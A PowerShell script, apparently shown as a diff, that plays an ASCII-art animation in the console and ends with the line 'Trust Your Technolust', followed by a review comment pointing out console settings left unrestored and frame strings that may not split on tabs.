" # # # 2a222222aBBB0; # # rMMMMMMMMMMMMMMMM: # # 7MMMMMMMMMMMMMBMM@80BX # # XMM@@@@@@@WWMBZMWMMMMMa # # 8M@WWWWWWWWWM0ZM0WMMMM, # # ZM@@@@@@@@W@M0ZM0BBWMX # # ZM@@@@@@@@@@MB2aZ008WM: # # ZM@@@@@@@@@@M82aa008@Mi # # ZM@@@@@@@@@@M8Z@8008WMi # # XM@WWW@@@@@@MBBM80B0WM # # WMWWBBBBBBBWW80MZZZWMM # # MMWWWWWWWWWW@Z0MZ8ZBMM # # MMWWWWWWWWW@@a0MaWW0MW # # MM@@@@@WWW@@@aWM0MMMMB # # MMMMMMMMMMMMMBWMMMMMM, # # i,...irrrrrrX. # # # # # # # "
|
||||
" # # # r8B0222222222; # # XMMMMMMMMMMMMMMMMM, # # 7ZB0008MMMMW@MMMMMMMMMMMMX # # ,MMMMMMMMWMM00@@@@@W@@@@MMX # # ZMM@@@@B8WW88@WWWWWWWWW@M0 # # 2MBWBBB0WW88@@WWWWWWW@@MW # # MM@0BB0W88888@@@@@@@@@@@MW # # @MM8BW0W88088@@@@@@@@@@@MW # # WMM80B0B0WM08@@@@@@@@@@@Ma # # WMB0BBWB8@MW8@@@@@@@@WW@MX # # 2M@@W0808W@WZWWBBBBBBBBWMM # # XMMMB8BB0W@WZBWWWWWWWWWWMM, # # .MM@BBMB8WMWZB@WWWWWWWW@MMi # # MMMMMMMB@MM8BM@@@@@@@@@MM2 # # ;MM@MMMMW00@MMMMMMMMMMMMMZ # # ;r;;ri..... . # # # # # # # "
|
||||
" # # # ...;7;., # # i08ZMMMWWWWBBMMMMMMMMM7 # # ,X2Z88WMMWBBBWi :M0aMMMMMMZXS8MMMMMMMMM # # 2MMMMMMMMMMMMMB aSSMMMMMMZ7XraMMMMMMMM # # 82XX@MWMMMMMMM; rXraMM@MMB7XrSMM@@@@MMr # # 0WB8r0MBaMMMB@MMMMS;ZM@@WMB7X77@M@@@@MMX # # 7MMMWBB0i:@8,WMM22aMMM7r7r;ri;7XXXr@M@@@@MM7 # # BMMWWBBW@7r2;WMW;a7XM@r77ri;XXrXXXrWM@@@@MMX # # 7MWWMWBWMZir;0MZiWZ:BM77X00@MMaSXXrBM@@@@MM # # MWBMMMMBiXM;aMS;MM;XMS77WMMMMM@77XMM@@WWMM7 # # @MB@@BWWSBM;2M7rXS7;B877aMMMMMBr77ZM@@W@MMM: # # rMWW@0B@WMM77@rXaZar2WX70MM@@MWr7rrWM@@@MMMZ # # MMBMWBWWMM8S0XZMMM8SBSXaMMMMMM7X7rBM@@@@MMW # # ,MMWWBBBWWMMMMMMM; r2XX7@M@WW02SXr0MMMMMMMM # # iWMMMMMMMMMMWZ iZZX0M@W82SXS # # , # # # # # # # "
|
||||
" # # # # # :XrX708Xi r2XXZMMB: # # X0BBWWMMMMMMMMMMZ rB27;MMMMi ;S7rXWMMM # # 7MMMMMMMMMMMMMMMM; ,X;i7MMMM ,S;;::ZMM2 # # ;7i;SXrBWB00MMMMMi . ,. i:i.7MMMX Z;i:.7MMM # # ZB88Z8; ZMMMZaMMMMMXBaMMMMM;:.7@MMM :X;ii,iMM@ # # 0MMMMMB88880X rMMi,8MMMW,;;;MMMM:::,..:rr;7;;;i:,MM@ # # .MMWWBBW8Z880@MX :Z:.XMMM;.rX .@M@.:::, :7Z7ii;i: @M@ # # @@008@MM080Z0MW.. :.;MMW..2M: .MMi,iiaBBM8rSra;i:,MM0 # # XM0880MMMMMr :.,MB .MM2 ,BMM. rMX,i:7MMMB aXi:rMMMX # # MB08ZWM@WM@SZS.BMM BMi,:::;.. 0B,ii,MMMM :Xii.;MMM # # rMB8Z8MM8ZBMMM8MMM aM.:;XSZ0r,i@X::SMMMM. ,X;i, 0MMi # # ZM08ZBM@800BBMMMMX.7Bri0MMMB;X:0Xii:aMMMS r;i: aMM7 # # 8M08ZW@88008B0BMMMMM, .,;;:: iai. iS2X:SMM: # # S@MWBBBBWWWMMW@Br. # # :;XXaZXri, # # # # # # # "
|
||||
" # # # # # .,,,.....,,,,. ::,::, ,r.::i: # # ;MMMMMMMMMMMMMMMMM, X27ii7 MM.::2M. # # 0MMMMMMMMMMWWWWMMM. ;7..;; 2M. .,2X # # :.;;ii: 2B88ZZWMM ,, ... .X ,,r .MZ . :Z # # 7BZZZZ80X.7MM7 :X7MB 7X8X2 iX..2X.,. MZ ..,X # # 8MMMMMMMWZZZZZZB2. 8MMi. MM :r,:.X8 ,7.,:;i;;, ..,,,i # # :M@BBBB0008Z0880B@M8, ,@7 8M r: X7 rS ;r.,,::,;XZ; .,,. # # MB8888ZWMMX7B0BBBMMS .. XM ;..B;. rr,X.,,Xi ,i27B0..:7 # # 2@8ZZZZ8MMW : 0Mi ,M. i.:M88, X7;.,,i, MM .,2X # # @B88ZZaWMMX ;SaaSX: 8M,; M0.,,.:rX:. X0i..;X MM .,.a. # # ;M088ZaaMMMMMMMMMMBXM ,. BM,.:7:,:i7,.0S..S0 ;M. ..X; # # XM08ZZa8MMM88080BWMM 7;.;@;;;2 :7.aS:i:r. @B,7iri # # 7MB8ZZa0MMBZZ888ZMMMMM. . . ,.:.,. # # ,W@B8ZaZ08Z88080M@8Ba # # ;ZBBBBBBWWB80X # # # # # # # "
|
||||
" # # # # # .2ZZZ0B0ZZaaZZaSSXX . # # :MMMMMMMMMMMMMMMMMM: SMMMMr7rrSMMMM2:r0. # # rM@M@@@@@MMW0000B@M7 2MMMM..:,aMMMMZ ,8X # # BMZZZ80@M: . MMMM. ,,.MMMMM .:S # # .,, iMBZZZ80@M8i;;rMMMr7iSMMMX;;iMMMM. ;;MMMMM ,,X # # ;MMMMMMMW80BZZZ80B@W; ;MMM ,iMMMM SMMM . ,,X. # # MMBBB0008ZZBBZ8880BWM@; XZ .rMMM2 X aMM .., ;X. ,:: # # 0@08888ZZ0 MMWBBWB8WMM . MMM. ,M8 MM .;rMMMMM.,7 # # :@8ZZZZZZW :MMW :Ma WM@ 7MM: Mr ,,iMMMMM .7X # # ZW88Z888B0 ,::,.WMMr. :MMM ZMX . SW..X:MMMMM .:X # # BW888880MS BMMMMB88BM7XMMM ;M: :i0MMW, 0:,; ;MMMMX,iX # # B@88880BM, MMZZZZ8B@2 r8M;.,B7ii .7Z@X.X:, i;,:: # # Z@08880WW 2MBaZ8800BMX: # # r@B8880BWMMBZ88880WMMM # # 8@WBBB088800WWW@r # # .SZB08880ZZ7;, # # # # # "
|
||||
" # # # .... # # 7MMMMMMMMMMMMMMMMMMWWWr # # .MMMMMMMMMMM@@@MMMMMMMa WMMMMMWX72ZWBr;: # # .MMMMMM@@MMM@WWBBBBB@MZ MMMMMM@i;MMMM27Z # # MMMMMM880B@Mi WMMMMMM.,WMMMZ,2 # # :;;;: 8MBWMMW800BMM8r2MMM02MMMW:iZMMS 2MMMZ,S. # # rMMMMMMM@8ZZZZ8B880BWMW;.7MMX.BMM2 .MMX , .iX # # MMMMMMB008888ZZZ88800B@M2 .8;.2MMr 7 7M7 ::rZ;ir # # MMMMMWZ8888888@MM@88880MMi. : XMM,.M2 M0.iMMMMrr, # # SMMMMMa888888BX .2M@WW@MX ,aW iM@ iMB r@,,@MMM;;X # # MMMMM8Z88888BS BMMMMMB:.rMM..MZ., :, 0r,MMMMXir # # ;MMMMMZ888880WMMM@000B0@SMMM, M2.ZMMM7SX:78WMZ;X # # ZMMMMWZ88800BBMMMZaZ8BWZ8BMS,22::i:X:. # # 0MMMMWZ88008ZBMMWZ800B2:. # # ZMMMMWZ8888ZZWMM88800@MMi # # :MMMMM88088ZZ0080BWM2 # # i8@MMM@@WWWWW@W8S; # # ,;X2XXXi. # # # "
|
||||
" # # # ::,:rrrrXZ2SSSri. # # XMMMMMMMMMMMMMMMMMMMMX # # MMMMMMMMMMMM@MMMMMMMZ WW000MMMSrSr # # ;W8ZZW@MMMM@@@@@@W@MM MMMMMMMMZMMMX # # MMMMMMMMMMB@Ma MMMMMMMMXWM@X # # ir;i.WM@@@WWWWMWWMMSaM8ZMZaM2ZMWr # # MMMMMMMWWWW0000BBB@MZ:Wa;MS:MZ;72r # # aMMMMMM@@@@B0BBBBBBWWMS7XSMS;0Z;Z0; # # ZMM@@@@@@@@0BBBB@MWBBM@;;2MXBaZSMMX # # :MM@@@@@@@@0BBBBWM@WWM27ZXM7BSZSMMS # # MMM@@@@@MMW0BBBBWW@MMX2MXW7XS2aMMa # # 8MM@@@@@@M@0BBBB@@WW@B@MSBaMMXX7Si # # MMM@@@@@MMBBBB0WMB0WBZ@XX: # # ZMMMM@@MMM@0BB0BMW0WB: # # MMMMMMMMMMB0BB0MMBB@MZ # # MMMMMMMMMM0BBBBWB@M # # MMMMMMMMMMWWWWMMW: # # ;rSaZWWMMMMM@Zi # # # "
|
||||
" # # # ZZ222228BBBBWZ # # ,MMMMMMMMMMMMMM # # MMMMMMMMMMMMMMi # # 2BMMMMMMMMMMMMS # # MM@@@@@@@@MMX # # 2MM@W@@@@W@MMX # # aMMWBBBBBBBBWMX # # 2MWBBBBBBBBBBMX # # SMM@@@@@@@@@MMX # # SMM@@@@@@@@@MM7 # # SMM@@@@@@@@@MM7 # # SMM@@@@@@@@@MM7 # # :MM@@@@@@@@@MM. # # .MM@@@@@@@@@MM. # # MM@@@@@@@@@MM. # # MMMMMMMMMMMMM. # # 8MMMMMMMMMMMM # # iMMMMMMMMMMMM # # # "
|
||||
" # # # .;Xa22aaa2rrrrr;, # # BMMMMMMMMMMMMMMMMMMM2 # # .7r2@M@0000BXWMMMMMMMMMMMMMMMMMMM # # ZMMMMMMMMMMMMMM@MMMMM@MMMM@0ZZZBS # # 2MM8MMMMMMMMMWW@MM@@@@@@M0 # # 7MMZMBB@8@BZ@WW@WWWW@WWWM0,irr # # 7BZa@aZW2W2Z@WWWWBBWWWWW@MMMMMM; # # rM8aWa8@aZZ@WWWWWWWWWWW@MMMMMMMM # # aMMZ0B8@a2BMWWMMWWWW@@@@@@@@MMMM # # 8M@ZZB8W88a@WWM@WWWWW@@@@@@@@@MZ # # 0MM00ZZWB@2WWWBWWWWWW@@@@@@@@@M; # # ,XS8MMW@WMW@W@@WWWWW@@@@@@@@@MM # # ,S00B@WW@WWWWWM@MM@@@@@MZ # # :0MW@@WWWW@M@@@@@@@MM # # MM@W@@WWWWM@@@@MMM@MX # # WM@@WWWWMMMMMMMMMM@ # # WMMM@@MMMMMMMMMM@ # # ;BMMMMMMMWW8aar # # . # "
|
||||
" # # # ..... # # XM@MMMMMMMMMMMMMMMMMMMS # # ;rZB22SS@MMMMWWX ZMMMMMMMMMMMMMMMMMMMMM, # # MaMMMMZXMMMMMMMS ZM@WWWWWW@WWMMM@MM@@@MX # # :87MMMMXi@MMMMMM ,M@B00BMMMMMM; # # ,ar@MM@iXMMZ7XMMMBZMMMW20M@B000WM@WWWMr:iiii. # # .2;:,:r;XMMi..@MMSrMM077BMB0000B8ZZ880MMMMMMMM2 # # S7SZrri7M2:S,8MMXiZXi2M@B00008888800BWBMMMMMMM. # # rS8MMM2:SM:ZM,XMM;iii;MM00000BMMW0000000BM@MMMM # # 2X8MMM7:8a:BMi;MM:2@ri7M@@W@@Mi ZB0000080M@@MMM # # S7WMMMS;0rrri;iMW,8M0:i8MMMMMMr 8W00000ZWM@@@Mi # # X70WZ8XS82MMMaiWBi0MM2BBBBBB@MMMB0000000MM@@MB # # ,;.:,;aSrWM0ZW08888MMMW0000000MMMMMM # # i,XW0008WMMB8000000MMM@MM # # MMMWB000MMW8000008MMMMMM # # iMMWB0000000000MMMMM0 # # ,20MM@@W@@@MMMMMW2 # # :rSZ882Xr. # # # "
|
||||
" # # # # # .. . Xa2ZZZZZZBWBBBBB0Z2 # # 2SrSMMMWWX7S2MMMMB BMMMMMMMMMMMMMMMMMM. # # .MX:XMMMMM;:i;MMMMM ,MMWBBBB0@MMMMMMMMMM: # # iS:,8MMMM@.i rMMMM; .. WMB000ZWMZ # # ;X:.8MMMMMi,iMMMMiXrWMMM07rWMMM7XraMM088888MM, .,., # # :ri. ,i,,MMM; :.SMMMM,:XMMZ:.i8@008888008BMMMMMMMM: # # ri,.Xr ::: WM7 iX MMMW..iZ. ;0MW0880088BBBBBBBBWWBMM # # rr,8MMMM@;:,,M8 MM aMMZ . .8MM8Z0WWWMMB ZB0000008M@ # # .Zi.8MMMMM.:.XM XMM. ,MMX :Ma . 2MMM BB888888aM: # # iX: 8MMMMW7,:B7 .. .. WMi XMMS .:0MM0 ,. 7M088888Z@B # # ;XriMMMM@;ri;8,7MMMWr: ZM: SMMMX8W800@MMMMX MB88888ZBM # # . . :,,7,20X;,.r:2Zi:0MZr,WB8Z800WMM B@08888ZWM # # ;ZWB088888MMX;M088880MB # # ZMMMB008080MM@W00880WW7 # # WM@WW08800000BWWS # # :iXZB00WWWWB8r # # # # # "
|
||||
" # # # # # .,.,.i :,..,. :,iiiiiiiiii;:,.. # # MS:irMMX i7i;7BM MMMMMMMMMMMMMMMMMB # # rZ,. rMM, .7,, MM SM@BBBBW@MMMMMMMMM # # S:.. BMM :i, MX .. ...aM0ZZ880r ., # # X,,, BM@ ..,Z,..MB :XZXXZ ;S;r ,Za::0BZZZZZ0. . # # i::. ,;i:i,. MB .S,,.,M ,i,i.X8r ;08ZZZZ80WMMMMMMMB. # # .::. ;27:::.,. WM i.,Z ZX ;i.iZX :MM0888800BB0000BBBM2 # # r:,:WMMr:.,X:,. MW . BS. iB ;:.:. :XM@0000B2 0MBZZ8888Mr # # XS,,,MMB ;., ,M7 ZMXr B. ;.:S;:. .. MMZZZZZZ8W # # S.,. MMS ,a,. Z0 i:;,. XS ; 7, Si ;7;77X; WMW2ZZZZZWr # # ,7., :MM ;0,.,B. X7, ,ri,.@2i.; XaM@MMMMM,rMM2ZZZZZBZ # # ,7i7.0Bi iii::Z,;8 rii@Z:;X.: ZMB0000BS MMZaZZZZB8 # # MMWM@8ZZZZ0ZMM02ZZZZBZ # # Z@S,@088Z88WW8ZZZ8BB7 # # rBBBWWWB0BWWW0S # # .:,..,,: # # # # # "
|
||||
)
|
||||
|
||||
|
||||
$counter = 0
|
||||
$maxCounter = $frames.Count
|
||||
$host.UI.RawUI.BackgroundColor = "Black"
|
||||
$host.UI.RawUI.ForegroundColor = "Red"
|
||||
1..4 | % {
|
||||
try
|
||||
{
|
||||
$host.UI.RawUI.WindowSize = New-Object System.Management.Automation.Host.Size 72,30
|
||||
}
|
||||
catch {}
|
||||
}
|
||||
|
||||
try
|
||||
{
|
||||
Clear-Host
|
||||
|
||||
$host.UI.RawUI.CursorPosition = New-Object System.Management.Automation.Host.Coordinates `
|
||||
0,([Console]::WindowHeight - 1)
|
||||
Write-Host -NoNewLine 'Press Q to Quit'
|
||||
|
||||
## Loop through the frames and display them
|
||||
[Console]::TreatControlCAsInput = $true
|
||||
while($true)
|
||||
{
|
||||
if([Console]::KeyAvailable)
|
||||
{
|
||||
$key = [Console]::ReadKey()
|
||||
if(($key.Key -eq 'Escape') -or
|
||||
($key.Key -eq 'Q') -or
|
||||
($key.Key -eq 'C'))
|
||||
{
|
||||
break
|
||||
}
|
||||
}
|
||||
|
||||
$host.UI.RawUI.CursorPosition = New-Object System.Management.Automation.Host.Coordinates 0,0
|
||||
Write-Host (($frames[$counter] -split "`t") -join "`r`n")
|
||||
Start-Sleep -m 150
|
||||
$counter = ($counter + 1) % $maxCounter
|
||||
}
|
||||
}
|
||||
finally
|
||||
{
|
||||
## Clean up, display exit screen
|
||||
Clear-Host
|
||||
$frames[0] -split "`t"
|
||||
"`n"
|
||||
" Trust Your Technolust"
|
||||
"`n`n`n"
|
||||
}
|
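Review bot: `[Console]::TreatControlCAsInput = $true` is set before the loop but never reset, and the `finally` block restores neither it nor the `$host.UI.RawUI.BackgroundColor`/`ForegroundColor` changes, so the host console is left in an altered state after the animation exits. Save the original values before changing them and add `[Console]::TreatControlCAsInput = $false` together with the saved colours at the top of `finally`, before `Clear-Host`. The `1..4 | % { try { ... } catch {} }` block retries the window resize four times while swallowing every error; a comment stating why four attempts are needed (presumably to let the buffer and window sizes settle) would help, since it is not obvious. As displayed here the frame strings contain `#` separators rather than tab characters; if that is the committed content, the tab split in ``Write-Host (($frames[$counter] -split "`t") -join "`r`n")`` never splits and each frame prints as one long line — worth confirming the tabs survived the commit.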